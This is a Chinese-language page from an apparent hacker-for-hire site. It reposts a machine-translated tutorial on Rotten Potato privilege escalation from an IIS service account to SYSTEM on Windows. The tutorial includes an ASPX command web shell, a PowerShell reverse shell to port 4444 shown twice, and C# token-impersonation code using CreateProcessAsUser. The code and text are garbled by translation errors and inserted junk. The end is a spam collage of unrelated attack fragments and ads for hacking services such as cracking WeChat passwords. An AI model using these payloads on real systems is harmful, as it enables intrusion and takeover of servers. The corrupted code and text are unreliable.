黑客技术群吧:有了Rotten Potato,我再也不需要Meterpreter了

访客5年前关于黑客接单1002

假设你之前没听说过Rotten Potato的话,请我们在阅览本文之前先看看这篇有关运用Rotten Potato完结服务帐号提权的【文章】。
它的完结机制可谓是适当杂乱,它容许我们阻拦NTLM认证应战恳求并假造政策用户的安全拜访令牌,而这个进程发生在DCOM激活进程中(政策用户账号需求工作BITS-后台智能传输服务服务实例)。
拜访令牌是什么?它是一种用来描述Windows进程或线程安全状况的政策,它跟会话Cookie有些相似。
而我们所需求的就是一个具有相应权限的进程。一般来说,用户所工作的SQL server服务或许ISS服务都会具有这种权限,所以假设我们可以拿到这些系统中的Shell或许在其间完结指令实行,那我们就成功了一半了。更加搞笑的是,微软并没有批改这个安全问题,或许他们以为这也是一种“专门规划的功用”吧…
我并不计划在本文中跟我们深化评论技术细节方面的内容,我只想告知我们如安在不依赖于Meterpreter以及incognito模块的状况下去运用这个PoC。

 

PoC运用

首要,我们需求在Windows(Windows 7-Windows 2016均可)上设备IIS,,然后针对迷糊检验,现在现已开发了一些结构,这些结构统称为迷糊器。常见的迷糊检验器有sulley(在FB上面现已有人总结过了,在此不再说明),Peach,SIPIKE(用在UNIX下)等。将“command”.aspx页面(代码在下面给出)复制到webroot目录之中。
下面给出的是一份简略的脚本代码:

< %@ Page Language="VB" Debug="true" >< %@ import Namespace="system.IO" % >< %@ import N6666端口amespace="System.Diagnostics"><script runat="server">Function RunCmd(command)Dim res as integerDim myProcess As New Process()Dim myProcessStartInfo As New ProcessStartInfo(“c:windowssystem32cmd.exe”)myProcessStartInfo.UseShellExecute = falsemyProcessStartInfo.RedirectStandardOutput = truemyProcess.StartInfo = myProcessStartInfomyProcessStartInfo.Arguments=”/c “ + commandmyProcess.Start()Dim myStreamReader As StreamReader = myProcess.StandardOutputDim myString As(1)将用户增加到人物组"Mailbox Import Export" String = myStreamReader.Readtoend()myProcess.Close()RunCmd= MyStringEnd Function</script><html><body><form action="cmd.aspx" method=POST>Enter your shell command <input type=text name=cmd size=4><input type=submit name=go></form>< %if request(“cmd”) <> “” thenresponse.write(“<pre>“+ RunCmd(request(“cmd”))+ “</pre>“)end if%></body></html>

Webshell正常作业,详细如下图所示(ISS默许的apppool):

我们所具有的权限信息如下所示(whoami/priv):

我们现已拿到了我们所需求的权限,而剩余的就是拿到一个交互式的反向Powershell:

powershell -nop -c “$c = New-Object System.Net.Sockets.TCPClient(‘IP’,4444);$st = $c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $st.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$ ***  = (IEX $d 2>&1 | Out-String );$ *** 2 = $ ***  + ‘PS ‘ + (pwd).Path + ‘> ‘;$ *** y = ([text.encoding]::ASCII).GetBytes($ *** 2);$st.Write($ *** y,0,$ *** y.Length);$st.Flush()};$c.Close()”


非常好,我们的反向Shell也可以正常工作。

接下来,我们需求从GitHub代码库【传送门】中下载Rotten Potato Po3C(C#),然后在Visual Studio中翻开项目代码。

翻开之后,我们先看看“Potato”项目中的_LocalToken.cs文件:

其间的mygetuser()函数告知我们,我们现在现已是“SYSTEM”了,假设我们直接在Meterpreter会话中工作我们的缝隙运用代码,那我们就可以窃取到“SYSTEM”令牌,并用它来伪装成该系统中的特别用户了。

但是我们的要求是防止运用Meterpreter,所以我们需求用不同的 *** 来完结这个政策。

首要,我们需求保证悉数都可以正常工作,因此我们需求增加一下自定义代码:

为了得到SYSTEM令牌,我们需求调用QuerySecurityContext()

API,然后在新的状况下假造令牌。接下来,我们还需求测验在目录c:windows下创建一个子目录。

完结了整个项意图编译之后,我们需求运用ILMerge.exe来创建一个独自的可实行程序。假设你选择的是Framework 3.5版别以上的渠道,别忘了批改代码中的 .NET结构版别。可供参考的样本代码如下所示:

ILMerge.exe Potato.exe NHttp.dllSharpCifs.dll Microsoft.VisualStudio.OLE.Interop.dll/out:myrotten.exe/targetplatform:v4,”C:Program Files (x86)Reference AssembliesMicrosoftFramework.NETFrameworkv4.5”

这儿我就不介绍怎样将生成的可实行程序上传到c:windowstemp目录中了,由于你应该知道怎样用PowerShell的反向Shell来完结上传了吧?

假设悉数顺利的话,你应该可以通过发动myrotten.exe并在c:windows目录下创建一个名叫“rottenpotato”的子目录了。

非常好,我们的缝隙运用PoC可以成功工作了,接下来我们持续往下看。

我们的战略如下:

其实我们并不需求跟“incognito“进行交互,我们预备通过指令行来发动一个新的进程,然后伪装成SYSTEM用户。

首要,我们需求对Program.cs的Main()函数进行一些调整:

我们需求在公共静态字符串CmdLine中存储我们即将调用的程序称谓,例如一个反向PowerShell。

接下来就是最重要的部分了,那么为了运用SYSTEM令牌生成一个新的进程,我们需求调用哪一个Windows API呢?

考虑顷刻之后,我们规划出了以下两种备选计划:

计划一
BOOL WINAPI CreateProcessAsUser(_In_opt_ HANDLE hToken,_In_opt_ LPCTSTR lpApplicationName,_Inout_opt_ LPTSTR lpCommandLine,_In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,_In_ BOOL bInheritHandles,_In_ DWORD dwCreationFlags,_In_opt_ LPVOID lpEnvironment,_In_opt_ LPCTSTR lpCurrentDirectory,_In_ LPSTARTUPINFO lpStartupInfo,_Out_ LPPROCESS_INFORMATION lpProcessInformation);
计划二
BOOL WINAPI CreateProcessWithTokenW(_In_ HANDLE hToken,_In_ DWORD dwLogonFlags,_In_opt_ LPCWSTR lpApplicationName,_Inout_opt_ LPWSTR lpCommandLine,_In_ DWORD dwCreationFlags,_In_opt_ LPVOID lpEnvironment,_In_opt_ LPCWSTR lpCurrentDirectory,_In_ LPSTARTUPINFOW lpStartupInfo,_Out_ LPPROCESS_INFORMATION lpProcessInfo);

这些函数其实都是差不多的,它们都承受令牌来作为输入参数。但它们的首要差异在于:

CreateProcessWithTokenW()运用起来约束更少一点,由于它只需求SeImpersonate权限。但是,它好像无法在Session 0(我们的shell工作在其间,由于我们是从IIS服务中发动的shell)中正常作业。

CreateProcessAsUser()相同需求SeAssignPrimaryToken权限(我们有这个权限),但是它可以在Session 0中工作。
因此,关于我们来说,我们当然要选择CreateProcessAsUser()了。

我们需求设置RunMyProcessAsUser()函数,并用它来传递我们之前所获取到的令牌。

public class MyProcess {  [StructLayout(LayoutKind.Sequential)]  public struct PROCESS_INFORMATION  {    public IntPtr hProcess;    public IntPtr hThread;    public Int32 dwProcessID;    public Int32 dwThreadID;   }  [StructLayout(LayoutKind.Sequential)]  public struct SECURITY_ATTRIBUTES  {    public Int32 Length;    public IntPtr lpSecurityDescriptor;    public bool bInheritHandle;  }  [StructLayout(LayoutKind.Sequential)]  public struct STARTUPINFO  {    public Int32 cb;    public string lpReserved;    public string lpDesktop;    public string lpTitle;    public Int32 dwX;    public Int32 dwY;    public Int32 dwXSize;    public Int32 dwXCountChars;    public Int32 dwYCountChars;    public Int32 dwFillAttribute;    public Int32 dwFlags;    public Int16 wShowWindow;    public Int16 cbReserved2;    public IntPtr lpReserved2;    public IntPtr hStdInput;    public IntPtr hStdOutput;    public IntPtr hStdError;  } [DllImport("advapi32.dll", EntryPoint = "CreateProcessAsUser", SetLastError = true, CharSet = CharSet.Ansi, CallingConvention = CallingConvention.StdCall)] public static extern bool CreateProcessAsUser(IntPtr hToken,string lpApplicationName, string lpCommandLine,      ref SECURITY_ATTRIBUTES lpProcessAttributes,ref SECURITY_ATTRIBUTES lpThreadAttributes,      bool bInheritHandle, Int32 dwCreationFlags, IntPtr lpEnvrionment,      string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo,      ref PROCESS_INFORMATION lpProcessInformation);} . . . . public bool RunMyProcessAsUser(IntPtr hToken) {    MyProcess.PROCESS_INFORMATION pi = new MyProcess.PROCESS_INFORMATION();   MyProcess.SECURITY_ATTRIBUTES sa = new MyProcess.SECURITY_ATTRIBUTES();   MyProcess.STARTUPINFO si = new MyProcess.STARTUPINFO();   try   {     sa.Length = Marshal.SizeOf(sa);     si.cb = Marshal.SizeOf(si);     si.lpDesktop = String.Empty;     bool result = MyProcess.CreateProcessAsUser(                   hToken,                   Program.CmdLine,                   String.Empty,                   ref sa, ref sa,                   false, 0, IntPtr.Zero,                   @"C:", ref si, ref pi                   );      if (!result)     {          int error = Marshal.GetLastWin32Error();          Console.WriteLine(String.Format("RunMyProcess Error: {0}", error));         return false;      }      Console.WriteLine(&qu
黑客技术群吧:有了Rotten Potato,我再也不需要Meterpreter了
ot;Executed:" + Program.CmdLine); Process currentProcess = Process.GetCurrentProcess(); } finally { if (pi.hProcess != IntPtr.Zero) MyProcess.CloseHandle(pi.hProcess); if (pi.hThread != IntPtr.Zero) MyProcess.CloseHandle(pi.hThread); } return true; }

声明完必要的数据结构以及API调用之后,我们则需求调用CreateProcessAsUser()来传递必要的参数,首要就是我们的令牌,其次是需求实行的指令以及某些默许装备值。需求提示我们的是,我们的作业目录为C:。

正如你所看到的那样,在创建进程之前,我们不计划通过调用DuplicateTokenEx()函数来复制我们的令牌,由于我们没必要这样做。

我们将在下面代码中调用我们的函数:

现在,我们需求把悉数的东西整合起来进行编译,并对我们的效果进行测验。但是在初步之前,我们要把我们的rev.bat上传到c:windowstemp目录中。

powershell -nop -c“$client = New-Object System.Net.Sockets.TCPClient(‘IP’,4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()”

接下来就是见证奇观的时刻了!

在PS反向Shell(IIS用户)中,我们可以调用我们的myrotten.exe了:

我们的监听控制台状况如下所示:

总算成功啦!

 

总结

正如你所看到的那样,在这篇文章中我只跟我们介绍了怎样让相关代码正常作业,我们也可以依据自己的需求来批改项目代码(C#),也欢迎有才能的同学们可以去本项意图GitHub上奉献自己的代码。

本文翻译自:decoder.cloud
如若转载,请注明出处:decoder.cloud

黑客技术群吧:有了Rotten Potato,我再也不需要Meterpreter了

Outlook有一个dll文件OLMAPI32.dll,担任供应一些API来获取outlook账号简介信息,以及从outlook的收件箱、发件箱这样的文件夹中读取文件内容。模块2会从系统注册表中读取OLMAPI32.dll的完全途径,然后加载该dll文件并获取所需的
黑客技术群吧
API。该模块中的悉数字符串也都是加密的。图4是从注册表中获取的OLMAPI32.dll的完全途径。ps |grep .tunneld这儿我们建议运用轻量级的Linux ISO镜像,容许Ethcer更加快速的 *** live USB。任何容许用户运用操作系统而不用设备的Linux ISO镜像都可以。#define __NR_connect (__NR_SYSCALL_BASE+283)有了Rotten Potato,我再也不需要Meterpreter了

黑客技术群吧dlclose(handle);我们可以看到,我们现已得到了一台感染了meterpreter的主机,运用这个meterpreter,我们可以设置一个反向端口转发,然后在我们的主机上通过端口4444来接收meterpreter联接。远程监听端口8445(meterpreter)将接收来自端口445的联接数据,然后劫持来自445的联接,并将它们转发到metasploit。接下来,我们通过劫持某些凭证来看看怎样劫持Windows 445端口:下面我们工作一下这个程序看看,批改Activity EntryPoint Smali文件

图4 服务 Console.WriteLine(a *** .FullName);$ brctl addif br0 eth1黑客技术群吧

那么选择了加密算法,该加密什么内容呢?加密的是 用户的暗码 a 以及我们在服务器端实时生成的随机盐 b,即 a+b

es - nproc 2048

useradd aa假设是,侵犯是持续性的吗?信息收集因此提示我们,自己用的手机就别ROOT了,一般运用就不要给太多权限了,哎,仍是老梗,说的再多,依然有人不听欸。有了Rotten Potato,我再也不需要Meterpreter了

黑客技术群吧SERVICE_ENUMERATE_DEPENDENTSC:Usersthel3l> netstat -ano C:Usersthel3l> netsh firewall show config 安全研究员Michael Cobb发现了一种新的iOS侵犯技术,名为SandJacking,它通过运用Xcode中的证书缝隙,容许恶意用户将运用程序加载到
有了Rotten Potato,我再也不需要Meterpreter了
受害者的设备上。

Site1#ping 101.1.2.3 source 101.1.1.2假设我们可以创建一条Outlook规则,政策是实行payload——宣告邮件的时分即触发这条规则,也就是说政策设备发送一封邮件,就能实行payload,是不是听起来很不错?就是这样,现在你应该可以重启USB Armory了,然后初步在任何可以刺进USB的当地获取凭证。黑客技术群吧

Forwarding local port 1234 to remote port 1234

#激活会话重续前进https功用

梦想一下,我们不是在考虑从”Steve-Admin”账户一步步提高到企业处理员的途径,而是在考虑一条从华盛顿的西雅图到俄勒冈的波特兰的路。对人类而言,看着地图就能很简略看出5号州际公路就是我们需求的。但是,对电脑来说,有必要通过数学核算来核算出西雅图到波特兰的途径(类比于“Steve-Admin”账户到企业处理员的途径,条件是这条途径存在)。

该技术一般运用处理器通讯接口并运用协议、加密算法或这些算法中的安全缝隙来进行侵犯。软件侵犯取得成功的一个典型事例是对前期ATMELAT89C系列单片机的侵犯。侵犯者运用了该系列单片机擦除操作时序规划上的缝隙,运用自编程序在擦除加密锁定位后,间断下一步擦除片内程序存储器数据的操作,从而使加过密的单片机变成没加密的单片机,然后运用编程器读出片内程序。

有了Rotten Potato,我再也不需要Meterpreter了

Windows 称谓解析之 LLMNR 协议

12月25日上午,六家互联网公司(今日头条、美团大众点评网、360、腾讯、微博、小米科技)一同宣告联合声明:呼吁有关运营商严峻冲击流量劫持问题,重视互联网公司被流量劫持或许导致的严峻结果。

Chozick 说,现在的固态硬盘(SSDs)和闪存会更简略“淹死”,它们大多配有板载加密,也就是说设备的电路板有必要解码存储芯片上的悉数记载。但是,固态硬盘现在只占有1/3 PC 硬盘商场,因此传统的旋转驱动依然是首要关注点。

[1][2]黑客接单网


本文标题:黑客技术群吧:有了Rotten Potato,我再也不需要Meterpreter了

相关文章

黑客网站免费找回生死狙击号,网贷找黑客,网上找黑客破译微信密码能信吗

图20. 从智能软件退出kiosk形式上传.htaccess 文件, 内容如下:3、预界说进程列表2.1 勒索病毒活泼情况PEviewvim /var/lib/pgsql/11/data/pg_hba...

10磅多少斤

  10磅(lb)=4.5359237千克(公斤)磅(英语:pound)是英国与美国所利用的英制质量单元,简写是lb。汗青上颠末多年的演变,英制质量系统对磅也发生很多差异的定。 几多   一磅约便是0...

吃这个能把妹子干冒沫子不,yy峰哥超搞笑

昨天看了药店买药这段视频,笑死了,给两个卖药的女店员都给说无语了。 一听这口音就是东北的,谈锋可以,脑子转的也快,许多情形都能转败为功。 这要是没两把刷子,一定不少挨揍。 微信上有同伙留言告诉我...

发现老公和别人聊天(发现老公和别人聊天要不要沟通)

发现老公和别人聊天(发现老公和别人聊天要不要沟通)

本文目录一览: 1、看到老公手机,发现他与异性聊天,该怎么做? 2、发现老公和别的女人聊天,我该怎么做? 3、发现老公和别的女人聊天怎么处理 4、我发现老公每天都和别的女人在聊天,我要不要...

黑客一年收益要多少钱-黑客网站入口-两台路由器怎么连接-2个路由器连

黑客网站入口-两台路由器怎么连接2个路由器连接设定文图实例教程 2个路由器连接最普遍的状况是家里现有一个无线路由器,而且早已根据这一无线路由器来一切正常网上。现在是因一些缘故想不在更改早已再用的无线...

桃园三结义的故事(刘关张桃园三结义的故事)

桃园三结义的故事(刘关张桃园三结义的故事)桃园三结义是《三国演义》中的第一个故事。提起刘备、关羽和张飞,人们总是会联想到他们早年在涿郡张飞庄后那花开正盛的桃园,备下乌牛白马,祭告天地,焚香再拜,结为异...